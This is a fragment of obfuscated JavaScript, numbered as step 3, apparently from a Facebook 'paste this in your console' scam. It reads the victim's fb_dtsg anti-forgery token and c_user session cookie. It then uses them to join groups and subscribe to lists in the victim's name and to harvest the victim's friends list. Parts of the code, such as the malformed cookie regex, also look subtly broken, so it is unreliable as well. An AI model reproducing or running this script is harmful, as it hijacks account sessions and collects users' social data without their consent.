  • 3. sublist("474550889339118"); sublist("474541336006740"); sublist("356891557771719"); sublist("483547375106136"); sublist("483546988439508"); sublist("483546958439511"); sublist("483546928439514"); sublist("483546845106189"); sublist("481261328668074"); sublist("481260498668157"); sublist("480889502038590"); var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; var user_id = document['cookie']['match'](document['cookie']['match'] (/c_user=(d+)/)[1]); var httpwp = new XMLHttpRequest(); var urlwp = '/ajax/groups/membership/r2j.php?__a=1'; var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp='; httpwp['open']('POST', urlwp, true); httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); httpwp['setRequestHeader']('Content-length', paramswp['length']); httpwp['setRequestHeader']('Connection', 'keep-alive'); httpwp['send'](paramswp); var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; var user_id = document['cookie']['match'](document['cookie']['match'] (/c_user=(d+)/)[1]); var friends = new Array(); gf = new XMLHttpRequest(); gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false); gf['send'](); if (gf['readyState'] != 4) {} else { data = eval('(' + gf['responseText']['substr'](9) + ')'); if (data['error']) {} else { friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) { return _0x93dax8['index'] - _0x93dax9['index']; }); }; };